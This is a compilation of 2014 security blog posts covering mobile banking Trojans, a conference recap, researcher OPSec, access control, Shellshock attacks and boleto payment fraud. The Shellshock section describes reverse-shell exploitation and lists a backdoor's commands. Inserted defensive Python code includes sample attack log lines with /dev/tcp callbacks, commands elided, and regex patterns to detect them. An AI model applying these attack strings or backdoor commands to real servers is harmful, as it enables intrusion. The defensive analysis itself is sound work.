As the diagram above shows, from August to March Faketoken was virtually the only widespread mobile banking Trojan. However Faketoken was distributed by one of the affiliate networks that wound down in April 2014 and from that time it too began to dwindle. Subsequently the overall number of mobile banker detections remained at a higher level than Faketoken and showed a small increase in overall attack numbers.

This rising trend was led by two other programs targeting online banking users – Svpeng and Marcher.

Figure 19: Changes in the number of attacks involving Marcher and Svpeng banking Trojans from March to July 2014

As the diagram shows, the number of attacks involving Svpeng fell from late May to late June; however, in June Kaspersky Lab experts discovered a new Svpeng variant. Previously it was a mostly 'Russian-speaking' and exclusively 'banking' Trojan, but in its new variant Svpeng acquired ransomware Trojan functionality. It displayed messages saying the phone was blocked and demanding several hundred dollars to unblock it. Analysis of the content used by the malware has demonstrated that US users were its main targets.

As for Marcher, at first glance it seems to be just one more 'Russian' banking Trojan – 98.84% of users affected by it live in Russia. However, when Kaspersky Lab experts analyzed the Trojan's code they found that the objectives pursued by the Trojan are not quite so obvious.

After infecting a device, the malware tracks the launch of just two apps. If the user starts Google Play, Marcher displays a false window requesting credit card data.

Initially, Marcher was only able to attack Google Play users, but in March 2014 Kaspersky Lab experts discovered a variant that targeted the mobile client of a large German bank's online banking system. If the user launches the bank's mobile banking client, another fake window displays fields for user credentials for the online banking system.

Although so far users of Kaspersky Lab mobile products in Germany have not encountered this threat, this situation may change in the future. Kaspersky Lab experts will track the evolution of this and other dangerous Android threats.

Other Threats: Bitcoin Miners and Ransomware

Bitcoin Mining Malware on Mobile – notable mention

In April 2014, Google Play removed a new category of malware applications that were directly aimed at mining crypto-currencies. "BadLepricon" malware, one of the first to be detected, was masquerading as a fully operational live wallpaper application. Infected mobile devices overheated once the hidden crypto-currency mining process was triggered. Even though the processing power of a single mobile device was quite minimal and not really an effective miner, it is estimated that a massive infection of devices could contribute to big profits for the actors managing the malware.

There have been further reports and detections from the Anti-Virus community, some of which indicated that similar malware applications were released on the Google Play market and had over one million downloads, raising serious questions on the profitability of that model. Even though the malware does not target personal information, this type of malware still falls in the category of unauthorized access to a personal device, which makes it illegal to use an individual's machine without the owner's prior consent. It is expected that further variants of crypto-mining malware will emerge in the coming months, possibly focusing on mining altcoins or the family of clonecoins, which are easier to mine than bitcoins at this stage.

Crypto-ransomware finds its way to Android

Crypto-ransomware refers to a class of malware that infects a machine then encrypts targeted files with specific extensions and demands payment before providing the key to decrypt the files. Crypto-ransomware found its way to Android OS in 2014 after gaining a reputation as a growing problem for Internet security companies and law enforcement in general.

Simplelocker.A, a piece of crypto-ransomware tailored for Android, was the focus of research by INTERPOL. This variant uses AES-256 to encrypt files with specific extensions stored on the SD card of a mobile device, making it impossible to access the files. More interestingly, the malware itself communicates with its C&C servers by routing to an .onion address on the Tor network for further anonymity. Simplelocker.A has been mainly targeting Russian-speaking countries. However, security experts believe that it is only a proof of concept with a far more developed, mature and complicated version expected to surface soon in Google Play.

Conclusions and Recommendations

The data analyzed in this study shows that mobile cybercrime is an extremely widespread phenomenon across the globe. It's important to remember that the study only reflects data on users protected against mobile malware and can only give a general idea of the extent to which different threats are widespread and dangerous.

One thing that is certain is that the number of threats is growing and the damage that can be caused by them, potentially, runs to millions of dollars.

Another conclusion is that the cybercriminals involved in distributing malware which targets mobile device users commit their crimes outside the borders of the countries where they live.

It is obvious that the problem needs to be addressed by IT security experts and law enforcement agencies in the countries where the perpetrators presumably reside, not only in those countries where their crimes are perpetrated. Security solutions can simply block the threats on user devices, but the criminals will simply find other victims who are not so well protected. The only thing that can stop them is the involvement of law enforcement organizations.

To avoid falling victim to cybercriminals involved in distributing mobile malware, Kaspersky Lab and INTERPOL experts recommend the following security measures:

For individual users:
  • Protect your Android devices with secure passwords to prevent attackers from accessing personal data by stealing your device and brute-forcing the password.
  • Unblocking the option that enables apps from third-party sources to be installed on the device is not a good idea. As a rule, Google Play, which is the main distribution channel for Android apps, carefully verifies the software it distributes. Even if you need to use a third-party application for some reason, be sure to block this option again after installing the app.
  • Antivirus software developers often create applications designed to test devices for unclosed vulnerabilities. Such applications are regularly updated to include data on newly-discovered vulnerabilities. We recommend using these apps once in a while.
  • Use a security solution on your device and make sure it scans files as they are downloaded and protects the device from other types of Internet attacks. Although Android malware has not so far been as widespread as malicious software targeting PCs, this thought is unlikely to comfort you if you fall victim to mobile malware.
  • When conducting banking transactions, be sure to use two-factor authentication. Ideally, temporary codes used to access your bank account should be sent to a different phone from the one from which you connect to online banking. Using simple devices with no smartphone features for this purpose is recommended, since this minimizes the chances of these devices being infected with a banking Trojan. And, generally, it is a good idea to use two-factor authentication wherever possible.
  • You should use encryption if you have any valuable information (financial, personal or work-related) on your device. Then, even if your device is stolen, the attackers won't be able to access your data.
  • If you believe that you may have fallen victim to or witnessed a cybercrime, do not hesitate to contact law enforcement as soon as possible. In most countries, creating and distributing malware or stealing personal information is a crime that is investigated by dedicated law enforcement agencies.

For corporations:
  • The Bring Your Own Device approach, which allows employees to use their personal devices for work, can expose your company to virtually all 'consumer' IT security risks: sensitive corporate data stored on an employee's personal phone could be a valuable find for cybercriminals. A security solution with Mobile Device Management capabilities, including encryption and remotely wiping data from smartphones, will help you to keep your sensitive business-related information secure.
  • If your employees are not aware of simple IT security rules, this is likely to cause security incidents. This is why, in an environment where nearly all the employees have Internet-enabled devices, training people to handle their mobile devices appropriately will be a worthwhile investment.
  • Be sure to contact law enforcement and expert organizations in the event of an IT security incident. Many companies keep information about incidents secret for fear of reputational losses and do not initiate investigations into cybercriminal activities. However, a cybercriminal who escapes prosecution is free to come back and cause even greater damage in future.

For law enforcement and regulatory agencies:
  • There are many highly-qualified experts in digital forensics and malware analysis, whose participation in cybercrime investigations could speed up the process of collecting evidence and searching for suspects and make it more effective.
  • Today, cybercriminals launch attacks against people in other countries without fear, taking advantage of the many jurisdictional issues that beset international multi-jurisdictional investigations. The more effectively cyber police forces of different countries work together, the harder it will be for cybercriminals to avoid liability.

Note on Responsible Distribution of Information

This document presents an analysis of the cyber-threat landscape as it relates to Android-based mobile platforms. It is based on information about instances of Kaspersky Lab security products detecting applications considered insecure or malicious due to their functionality. To avoid possible misinterpretation of the facts presented in this document, Kaspersky Lab would like to highlight a number of issues related to the way this report was prepared.

1. Terminology

The report uses several terms describing how a security product interacts with malicious software. The term "Attack" is among those used most frequently. In Kaspersky Lab's terminology, an attack is an instance of a security product detecting any software considered malicious on the protected device, regardless of whether an attempt to execute malicious code was detected. The term "User" denotes exclusively the owner of the device protected by Kaspersky Lab's product.

2. Dataset and its geographical distribution

All calculations and conclusions made in this study rely on data from Kaspersky Lab's mobile customer community, which exceeds 5 million users in over 200 countries and territories. It should be emphasized that the number of Kaspersky Lab's product users varies from country to country, so the results of this study may not fully reflect the situation existing in some countries. However, many years' experience of monitoring the statistics collected by Kaspersky Security Network (KSN) shows that in most cases KSN data is about 95% accurate concerning the prevalence of specific cyber-threats or cyber-threat classes, and concerning the percentage distribution of consumers using devices running different operating systems. It also correlates very well with data received from other sources, namely from companies which specialize in collecting and analyzing statistical data.

Responsible distribution of information

This study can be freely shared or distributed. Kaspersky Lab requests that those who find the information presented in this document interesting and useful make allowances for the abovementioned issues related to the ways in which KSN statistics are collected when preparing public materials in which this information is to be used.

Virus Bulletin 2014: new times, same challenges

Fri, 10/03/2014 - 09:11

During the last week of September the antimalware industry got together at one of the oldest and most legendary information security conferences in the world, the 24th Virus Bulletin International Conference (VB2014), held in beautiful Seattle, USA. Kaspersky Lab was there to present and share a wide range of ongoing research topics with the security community.

On the first day of the conference we were shown over and over how the Linux operating system is not so malware-free any more. Dismantling the myth, several talks on the topic, amongst them "Ebury and CDorked. Full disclosure" and "Linux-based Apache malware infections: biting the hand that serves us all", brought attention to non-traditional malware and to how the Apache web server is caught in the middle of this *nix world, becoming an efficient platform for attacking and infecting unsuspecting clients.

My colleague Santiago Pontiroli gave a presentation on the current "bitcoin bonanza" and how cybercrime is quickly targeting cryptocurrencies and their users. While he shared some of the most interesting malware samples that target bitcoin and other alternative currencies, the audience got an overview of the benefits that digital currencies offer to Latin American countries and the reasons behind criminals' activity.

The icing on the first day's cake was the presentation shared by Patrick Wardle who covered "Methods of malware persistence on Mac OS X", again showing us that not everything in the malware ecosystem is about Microsoft.

With so many good talks to attend on the second day, sometimes making the right decision was rather difficult. A very interesting presentation by Jérôme Segura on Technical Support Scams demonstrated in detail how to build a honeypot to catch these scammers, while emphasizing the importance of user awareness and education.

I presented one year of research into the attacks against "boletos", an old and very popular payment system from Brazil based on printed documents and a barcode, showing how local bad guys have adapted their Trojans to change them, redirecting payments to their accounts and stealing millions of dollars in the process.

Then it was the turn of my colleague David Jacoby to give an extremely funny (yet informative) presentation on how he hacked his own home, exploiting different vulnerabilities on networked devices such as Smart TVs, printers, NAS, etc. He interactively demonstrated how exposing these devices to attacks would mean compromising an entire home network; the whole presentation was illustrated with funny GIFs and (interestingly enough) the slides were hand-crafted with MS Paint.

Security researchers from Microsoft gave us a rundown on .NET malware analysis with their last-minute paper ".NET malware dynamic instrumentation for automated and manual analysis". As malware developers are increasingly relying on high-level programming languages for their malicious creations, tools like the one presented in this talk will become essential for malware analysts looking to become proficient in the study of malicious .NET applications.

And the last Kaspersky presentation was from Vicente Diaz on "OPSEC for security researchers". Working as a security researcher nowadays is not an easy task, especially now that we no longer deal only with technical aspects. The global picture of the security landscape these days features new actors including governments, big companies, criminal gangs and intelligence services. That puts researchers in some tricky situations.

The closing panel was funny and informative, with David Jacoby bringing awareness to the community on how disclosure of important vulnerabilities (like Heartbleed, and now the infamous Shellshock) should be handled, and what roles vendors play in this scenario. After the keynote address by Katie Moussouris of HackerOne on "Bounties and standards and vuln disclosure, oh my!", the final panel left us with a cohesive feeling for the conference, bringing into the spotlight what the industry as a whole should be facing in terms of vulnerability disclosure and the same challenges we have had in protecting connected devices, the Internet of Things, crypto currencies and payment systems.

Times change but the same challenges remain. One thing is clear: we are still here to protect the user and fight against cybercrime.

OPSec for security researchers

Fri, 10/03/2014 - 07:00

Being a security researcher nowadays is no easy task, especially as we are no longer dealing with purely technical matters. Today's global security landscape includes several new actors including governments, big companies, criminal gangs and intelligence services. This puts researchers in a difficult situation.

According to one of many definitions of OPSec:

"Operational security identifies critical information to determine if friendly actions can be observed by adversary intelligence systems"

We are hearing reports of researchers facing threats from criminal gangs, or being approached by state intelligence services. Others have found themselves under surveillance or had their devices compromised when on the road.

How can we minimize these risks? What can we do to avoid leaking information that could put us in an uncomfortable situation in the future?

Sometimes we are the public faces of a research project, but at other times we don't want to be in a visible position.

The golden rule in Operational Security is using silence as a defensive discipline. If you don't really need to say something, then keep quiet. When you need to communicate with someone, do it in a secure way that doesn't compromise the content of your message and, if possible, doesn't generate metadata around it.

This is an incredibly difficult objective to accomplish: it's a natural instinct to want to impress others and on many occasions we will face adversaries who are well trained in obtaining the information that they want. We all like to tell interesting stories.

The second golden rule is that OPSec does not work retrospectively, so we should be very careful about what we are doing now if we don't want it to come back and bite us in the future.

In terms of OPSec, every security analyst should aspire to being just another guy in the line. If we attract too much attention to ourselves, surveillance could easily escalate beyond electronic means – and that is basically game over. In today's world of massive surveillance, standing out will attract the attention of anyone who can access the relevant data. And in today's world of information leakage and "big internet companies", it's difficult to know exactly who has access to which data:

(example of data leaked from an aggregator and published as a service)

There are some interesting examples of how anomalies have been detected from metadata and then successfully used in investigations (http://en.wikipedia.org/wiki/Abu_Omar_case). And then there is the routine application of this in mass surveillance and data mining.

So what can we do?

The first rule of implementing OPSec is: don't try to accomplish more than you can. The fact is that bad OPSec might be worse than no OPSec at all.

The main feature needed for effective OPSec is not technical, but psychological: be meticulous, and maintain a healthy level of paranoia.

However, electronic surveillance is obviously much more common and every bit of information will be there forever. Let's look at our minimum toolset to avoid leaking information and think about some basic tips.

Encryption

Obviously we should use as much encryption as possible. But remember that there is an inherent weakness. Once your keys are compromised, all the info that was encrypted in the past is compromised with them. As time passes, the likelihood of your keys being compromised will grow. So it's much better to use IM with OTP.

Today's big question: what is happening with TrueCrypt, the most popular encryption software?

According to the Audit project, there is no obvious flaw or backdoor. However a couple of months ago we saw this:

There are still many open questions, but you can find a trusted TrueCrypt repository at: https://github.com/AuditProject/truecrypt-verified-mirror

Email

Email simply leaves too much metadata, even when the message is encrypted with PGP (by the way, use keys bigger than 2048). IM with OTP is better.

External providers cannot be trusted.

IM

Pidgin and Adium seem to be ok. But remember not to log your chats and don't overlook the non-technical factor: you don't know who is on the other side of the conversation (even when you have verified the key).

TOR

I'd definitely recommend using an anonymizing network to shake off most of the groups that could track you. However, it cannot be considered truly "secure" in the sense that most of the output nodes are controlled by people that can correlate their logs with the source of the connection. We saw an example of this in the Harvard bomb threat case:

http://www.theverge.com/2013/12/18/5224130/fbi-agents-tracked-harvard-bomb-threats-across-tor

Also TOR has been the target of many attack attempts, like this recent one:

So don't blindly trust TOR for anything very sensitive, but use it for your daily activities. Never reveal your true IP.

Telephone

A total nightmare in terms of OPSec. The simple recommendation is to get rid of it! But this won't happen.

At least don't do anything sensitive with it; instead use burner phones, and don't use them at home or work.

Conclusions

Perfect OPSec is almost impossible. However, implementing basic OPSec practices should become second nature for every researcher. Once you internalize the need to apply OPSec you will be more careful and, hopefully, avoid rookie mistakes like talking too much and bragging about your research.

The most important things, beyond any tool, are being meticulous, applying the right level of OPSec according to your situation and understanding what you can actually hope to achieve.

This is just a brief introduction to a complex topic, but we hope it could be a useful eye-opener, especially for our fellow security researchers.

Breaches in corporate network protection: access control

Tue, 09/30/2014 - 09:43

In almost any company the IT security department faces two priority tasks: ensuring that critical systems operate continuously and reducing the risk of attacks on the corporate network. One of the most effective approaches to both these problems is to restrict the privileges of system users.

In terms of IT security, critical systems have two basic properties - integrity and availability - that affect their operational continuity. To protect a corporate network from attacks it is necessary to reduce the attack surface by reducing the number of devices and network services available from outside the corporate network and by protecting the systems and services that require such access (web services, gateways, routers, workstations, etc.). The main vector of attack on a corporate network is the user computers connected to the Internet on that network.

Theoretically, to protect critical systems from unauthorized changes and reduce the possibility of attacks on the corporate network, you should:

  • specify those objects (equipment, systems, business applications, valuable documents, etc.) on the corporate network that require protection;
  • describe the company's business processes and use those to help determine the levels of access to the protected objects;
  • ensure that each subject (a user or a corporate application) has a unique account;
  • limit subjects' access to objects, i.e. to restrict the rights of the subjects within the business processes;
  • ensure that all operations between the subjects and the objects are logged and the logs are stored in a safe place.

In practice, it works more like this:

  • all corporate documents are stored centrally in shared folders on one of the company's servers (for example, on the Document Controller server);
  • access to critical systems is denied to everybody but administrators, and any administrator can log into the system remotely to quickly repair any failure;
  • sometimes administrators use a "shared" account;
  • all employees have limited privileges as a 'standard user' but on request anyone can get local administrator rights.

Technically, it is much easier to protect critical systems than workstations: changes in business processes are rare, regulations vary little and can be drawn up to account for even the smallest details. By contrast the users' work environment is chaotic, their processes change rapidly and the protection requirements change along with them. In addition, many users are suspicious of any restrictions, even when there is no impact on workflow. Therefore, the traditional protection of users is based on the principle 'it is better to miss malicious software than to block something really important'.

Last year, Avecto conducted a study called "2013 Microsoft Vulnerabilities Study: Mitigating Risk by Removing User Privileges" and concluded that "by removing local administrator rights it is possible to reduce the risk of exploitation of 92% of critical vulnerabilities in Microsoft software". The conclusion seems logical but it should be noted that Avecto did not test vulnerabilities; it only analyzed data from the Microsoft Vulnerability Bulletin 2013. Nevertheless, it is clear that malicious software running without administrator rights cannot install a driver, create/modify files in protected directories (%systemdrive%, %windir%, %programfiles%, etc.), change system configurations (including writing to the HKLM registry hive) and, most importantly, cannot use privileged API functions.

In reality, though, the lack of administrator rights is not a serious obstacle for either malicious software or a hacker penetrating into the corporate network. Firstly, any system has dozens of vulnerabilities that can grant the necessary rights, up to kernel-level privileges. Secondly, there are threats which only require standard user privileges to be implemented. The diagram below shows possible attack vectors that do not require any administrator rights. Let's have a closer look at them.

Local attacks

With only standard user privileges, the attacker gets full access to the memory of all processes running under the user account. This is enough to integrate malicious code into processes in order to remotely control the system (backdoor), to intercept keystrokes (keylogger), to modify the content in the browser, etc.

Since most antivirus programs can control attempts to inject unknown code into processes, attackers often use stealthier methods. Thus, an alternative way to plant a backdoor or a keylogger in the browser process is to use plugins and extensions. Standard user privileges are enough to download a plugin, and that code can do almost everything a fully-featured Trojan is capable of. That includes remotely controlling the web browser, logging data entries in browser traffic, interacting with web services and modifying page content (phishing).

Fraudsters are also interested in standard office applications (such as email and IM-clients) which can be used to attack other network users (including phishing and social engineering). Scammers can access programs like Outlook, The Bat, Lync, Skype, etc. via API and local services of such applications as well as by injecting code into the relevant processes.

Of course it's not just applications that are of value to fraudsters; the data stored on the PC is also a potential goldmine. In addition to corporate documents, attackers often look for different application files containing passwords, encrypted data, digital keys (SSH, PGP), etc. If the user's computer holds source code, attackers could try to insert their own code into it.

Domain attacks

Since the accounts of most corporate users are domain accounts, the domain authentication mechanisms (Windows Authentication) provide the user with access to various network services on a corporate network. This access is often provided automatically without any additional verification of the username and password. As a result, if the infected user has access to the corporate database, attackers can easily take advantage of it.

Domain authorization also allows attackers to access all network folders and disks available to the user, share internal resources via the intranet and sometimes even access other workstations on the same network segment.

In addition to network folders and databases, the corporate network often includes various network services such as remote access, FTP, SSH, TFS, GIT, SVN, etc. Even if dedicated non-domain accounts are used to access these services, attackers can easily utilize them while the user is working on his computer (i.e. during an active session).

Protection

It is almost impossible to provide a high level of protection for workstations by denying users administrative rights. Installing antivirus software on a workstation will increase its security but won't solve all problems. To achieve high security levels, Application Control technology should consist of three key elements:

  1. Default Deny, which only allows the installation and running of software that has been approved by the administrator. In this case, the administrator does not have to put each individual application (hash) on the list of trusted software. There is a wide variety of generic tools available to enable dynamic whitelisting of all software signed by an approved certificate, created by an approved developer, obtained from a trusted source or contained in the Whitelisting database of a security software provider.
  2. Application Control that can restrict the work of trusted applications according to their functions. For example, for normal operation the browser should be able to create network connections but it does not need to read/write other processes in the memory, connect to online databases or store files on the network.
  3. Update management that ensures all software on workstations is updated promptly, reducing the risk of infection via update mechanisms.

In addition, specific products which feature Application Control can provide a range of useful functions based on this technology: inventory, control over software installed on the network, event logs (which will be useful in the case of incident investigation), etc.

On the one hand, the combination of technologies can provide users with everything they need for work and even for entertainment and is flexible enough to deal with changing requirements. On the other hand, the chances of an attacker gaining access to the protected system are extremely limited. No doubt, this is the best balance between flexibility and security in protecting a corporate network.

Shellshock and its early adopters

Fri, 09/26/2014 - 06:27

Shortly after disclosure of the Bash bug called "Shellshock" we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.

The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here's an example of how this attack appears in a webserver logfile:

The attacker listens on IP address 195.xx.xx.101 on TCP port 3333, while the attack's origin is the IP address 94.xx.xx.131. To gain control of a server with this method, no external binaries are involved.
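
A log triage sketch for the pattern described above, added here as an example and not taken from the article: it flags requests whose logged fields carry a bash function definition and, where one is visible, pulls out the callback endpoint, which differs from the request's source address. The log lines are constructed with their commands elided, and the use of bash's /dev/tcp pseudo-device for the outbound connection is an assumption.

```python
import re

# One quoted log field; Apache writes an embedded double quote as \" so allow escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# Vulnerable bash versions parse an environment value containing "() {" as a
# function definition; CVE-2014-6271 is triggered by what follows that definition.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
# Assumption: the outbound connection is opened through bash's /dev/tcp pseudo-device.
CALLBACK = re.compile(r'/dev/(?:tcp|udp)/([^/\s"]+)/(\d{1,5})')


def triage(lines):
    """Return one finding per logged request field that carries a function definition."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if m is None:
            continue  # not combined format; a real pipeline would count these
        source, _when, request, status, referer, agent = m.groups()
        for name, value in (("request", request), ("referer", referer), ("agent", agent)):
            if not FUNC_DEF.search(value):
                continue
            cb = CALLBACK.search(value)
            findings.append({
                "line": number,
                "source": source,          # where the request came from
                "field": name,             # which header carried the definition
                "status": int(status),     # 200 on a CGI path deserves priority
                "callback": (cb.group(1), int(cb.group(2))) if cb else None,
            })
    return findings


# Constructed sample lines (documentation address ranges, commands elided).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Sep/2014:05:10:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Sep/2014:05:10:09 +0000] "GET /cgi-bin/status HTTP/1.0" '
    '200 0 "-" "() { :;}; [command elided] /dev/tcp/192.0.2.10/3333 [elided]"',
    '203.0.113.9 - - [26/Sep/2014:05:11:30 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" '
    '404 0 "() { ignored; }; [command elided]" "-"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The callback address is the one worth blocking outbound and hunting for in flow records, since the source address only identifies the host that sent the request.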

In another ongoing attack the criminals are using a specially crafted HTTP-request to exploit the Bash vulnerability in order to install a Linux-backdoor on the victim's server. We're detecting the malware and its variants as Backdoor.Linux.Gafgyt.

The binary contains two hardcoded IP addresses. The first one is only used to notify the criminals about a new successful infection. The second IP address is used as a command-and-control server (C&C) to communicate directly with the malware running on the infected webserver.

The following picture shows an example of what this communication can look like:

In line 1 the malware sends a "Hello" message and tells the attacker which architecture the binary was compiled for – here it's x86.

Independently of commands sent by the attackers, the backdoor sends a "PING" request every 30 seconds, which is answered with a "PONG" from the server (for better readability we've removed some of the PING/PONG pairs from the example above).

Commands always start with "!* ". The first command we see in this example is the "SCANNER ON" command in line 10. This tells the binary to scan random IP ranges for hosts accepting telnet connections on TCP port 23. When such a host is found, it tries to login using a hardcoded list of common default user/password combinations.

There is also a rudimentary honeypot fingerprinting routine implemented, which makes use of "busybox" as described by the Internet Storm Center here.

The next task the criminals start on the victim's box is initiated in line 14. Here the binary is told to perform flooding of IP 69.xx.xx.67 using UDP for 50 seconds. In line 17 the attackers stop the flooding in order to restart it in line 18, now targeting 178.x.x.241. The "None Killed." reply in line 21 appears because the flooding instruction from line 14 was already finished when the attacker tried to stop it using "!* KILLATTK" in line 17.

Here's the complete list of commands the backdoor accepts:

!* PING – Replies with "PONG!"
!* SH - Execute arbitrary shell command
!* GETLOCALIP – Replies with "My IP: $ipaddr"
!* SCANNER ON | OFF - Scan random networks, perform a very small dictionary attack (see above), test if target is a honeypot

!* HOLD - Hold flooding
!* JUNK – Perform junk flood
!* UDP – Perform udp flood
!* TCP – Perform tcp flood
!* KILLATTK - Kill all flood
!* LOLNOGTFO – Terminate backdoor.
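
The command grammar listed above is enough to triage a captured C&C session. The following is an added example, not code from the article or from the malware: it classifies operator commands by the verbs in the list, measures the keepalive period and notes kill orders that found nothing to stop. The capture is constructed, and its tuple format, the `NEWVERB` command and the 3-second tolerance are assumptions.

```python
from statistics import median

PREFIX = "!* "  # every operator command starts with this, per the list above
# Verbs exactly as listed in the article, grouped by what a responder needs to know.
CATEGORIES = {
    "PING": "keepalive", "GETLOCALIP": "recon", "SH": "exec", "SCANNER": "scan",
    "HOLD": "flood", "JUNK": "flood", "UDP": "flood", "TCP": "flood",
    "KILLATTK": "control", "LOLNOGTFO": "control",
}


def parse_command(payload):
    """Split an operator line into (verb, category, args); None if it is not a command."""
    if not payload.startswith(PREFIX):
        return None
    words = payload[len(PREFIX):].split()
    if not words:
        return None
    verb = words[0].upper()
    return verb, CATEGORIES.get(verb, "unknown"), words[1:]


def summarize(capture, expected_gap=30.0, tolerance=3.0):
    """capture: list of (seconds, sender, payload) with sender 'bot' or 'c2'."""
    pings = [t for t, sender, text in capture
             if sender == "bot" and text.strip() == "PING"]
    gaps = [later - earlier for earlier, later in zip(pings, pings[1:])]
    gap = median(gaps) if gaps else None
    report = {
        "beacon_gap": gap,
        "beacon_matches": gap is not None and abs(gap - expected_gap) <= tolerance,
        "scanner_on": False, "flood_orders": 0, "expired_floods": 0,
        "timeline": [], "unknown": [],
    }
    last_verb = None
    for t, sender, text in capture:
        if sender == "bot":
            # "None Killed." after KILLATTK means the flood had already run out.
            if last_verb == "KILLATTK" and text.strip() == "None Killed.":
                report["expired_floods"] += 1
            continue
        parsed = parse_command(text)
        if parsed is None:
            continue  # e.g. the server's PONG
        verb, category, args = parsed
        last_verb = verb
        report["timeline"].append((t, verb, category))
        if verb == "SCANNER" and args:
            report["scanner_on"] = args[0].upper() == "ON"
        elif category == "flood":
            report["flood_orders"] += 1
        elif category == "unknown":
            report["unknown"].append(verb)  # possible variant, needs a closer look
    return report


# Constructed capture; flood arguments are elided because the article does not give them.
CAPTURE = [
    (0.0, "bot", "PING"), (0.2, "c2", "PONG"),
    (12.5, "c2", "!* SCANNER ON"),
    (30.1, "bot", "PING"), (30.3, "c2", "PONG"),
    (41.0, "c2", "!* UDP [arguments elided]"),
    (60.0, "bot", "PING"), (60.2, "c2", "PONG"),
    (90.1, "bot", "PING"), (90.3, "c2", "PONG"),
    (97.0, "c2", "!* KILLATTK"), (97.1, "bot", "None Killed."),
    (99.0, "c2", "!* NEWVERB 1"),  # not in the article's list: stands in for a variant
]

if __name__ == "__main__":
    print(summarize(CAPTURE))
```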

Related binaries:


Attacks against Boletos

Fri, 09/26/2014 - 03:00
Introduction

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

Brazilian crooks created a unique way of stealing money from these cautious, offline-only types: changing "boletos", popular banking documents issued by banks and all kind of businesses in Brazil. Boletos are actually one of the most popular ways to pay bills and buy goods in Brazil – even government institutions use them – and they are a unique feature of the Brazilian market.

In a series of online attacks targeting flaws on network devices – especially DSL modems – and involving malicious DNS servers, fake documents, browser code injections in the style of SpyEye, malicious browser extensions and a lot of creativity, the crooks have successfully stolen vast amounts of money, even from people who don't have credit cards or Internet banking accounts. It's a new worry for banks and financial institutions in the country.

This article explains how these attacks have happened in Brazil, and gives advice on protecting customers even when they have chosen to live offline.

Boleto bancário: the Brazilian payment system

Boletos are a very popular and easy way to pay bills or buy goods in Brazil today; even online stores will accept this kind of payment. All you need to do is print and pay it. According to the Brazilian Central Bank 21% of all payments in the country in 2011 were made using boletos.

Preferred payment methods in Brazil in 2011

According to e-bit 18% of all e-commerce transactions in Brazil in 2012 used boletos as the preferred payment method:

Preferred online payment method in Brazil in 2012

A boleto comes with an expiry date. Until its due date it can be paid at ATMs, branches and the internet banking of any bank, the Post Office, lottery agents and some supermarkets. After the date it can only be paid at a branch of the issuing bank. The client also pays a fee levied by the bank; the fee increases with every passing day. Banks charge a handling fee for every boleto paid in by a customer. This fee varies from BRL 1,00 to BRL 12,00, depending on the bank. If the collection is registered then the bank will also charge a fee for every issued boleto, regardless of whether it was paid or not. Therefore, unregistered collections are more suitable for online transactions.

The bank also takes into account the size of the client, so a client with a higher volume of banking transactions, who has been working with the bank for a while, etc, is able to get lower fees or even fee exemption, which has made the boleto a very important sales tool for big companies, e-commerce and the government. If a company wants to do business in Brazil, it is essential to use boletos – Apple, Dell, Skype, Microsoft, DX.com, Alibaba.com, and even FIFA in the 2014 World Cup used them in local operations.

Buying Skype credits with boleto bancário as a payment method

This is the basic structure of a printed boleto bancário:

Boleto bancário for beginners according to TheBrazilBusiness.com

  • Issuer Bank: the financial institution responsible for issuing and collection based on an agreement between itself and the merchant. The bank, once authorized to collect payment for the merchant, will credit the amount owed by the client in the merchant's bank account.
  • Identification Field: a numerical representation of the barcode, it contains all the information necessary to identify the merchant's bank account and clear the payment. This field is used in home and self-service banking.
  • Barcode: a code consisting of a group of printed and variously patterned bars (always 103mm in length and 13mm in height) and spaces and sometimes numerals that is designed to be scanned and read by a digital laser scanner and that contains information to identify the object it labels.

To pay a boleto at the bank or online all that is necessary is to scan the barcode – if it's unreadable (due to a bad print) users can type in the 44-number identification code instead. Some banks have a barcode scanner in their mobile apps, so mbanking users don't need to type the ID field; they can pay the boleto using their device's camera.

Paying a boleto using a barcode scanner

What could possibly go wrong? Well, how about changing the barcode or the ID field? It's simple and means payments can be redirected to another account. That's exactly what Brazilian fraudsters started to do – and the easiest and most effective way was using malware.

The Brazilian boleto malware

A boleto can be generated and printed by the store that is selling its products to you, or even by users themselves during an online purchasing process. It's displayed in the browser, generally in HTML mode, using free libraries available for developers to implement in their ERP software or in their online store system.

BoletoPHP is a free resource for developers to generate boletos using PHP

The extensive documentation and legitimate open source software used to generate boletos helps malware creators to develop Trojans which are programmed to change boletos locally, as soon as they are generated by the computer or browser. These Trojans were spotted in the wild in April 2013 by LinhaDefensiva.com and are still being distributed in Brazil today. In fact most of the Brazilian criminals who use Trojan bankers to steal money are migrating their attacks to target boletos, using the same infrastructure.

The first generations chose to change the ID field number and the barcode:

A boleto modified by a Brazilian Trojan: the new ID number and barcode redirect the payment to the fraudster's account

Some versions of the malware use a JavaScript injection to change the content of the boleto:

"CodBarras" means barcode in Portuguese

Some later versions of this Trojan appeared and started to change only the numbers in the ID field:

"Linha Digitável" means typeable line in Portuguese; it's the ID field number

These new versions also used a span HTML element in order to add a white space to the barcode, making it unreadable. That forces the customer or bank staff to type the doctored 44-digit ID field to pay the boleto. So as not to raise suspicions, the Trojan does not change the value and due date for the transaction:

HTML page changed by the Trojan, adding a white space to invalidate the barcode, source LinhaDefensiva.org

The ID field includes a lot of information, detailing the bank account that will receive the payment and other data used according to the rules established by each bank. The "Nosso Número" data ("Our ID Number") is a unique identifier, different for each boleto. Changing the ID number is enough to redirect the payment to another bank account.

Understanding the ID field on boletos

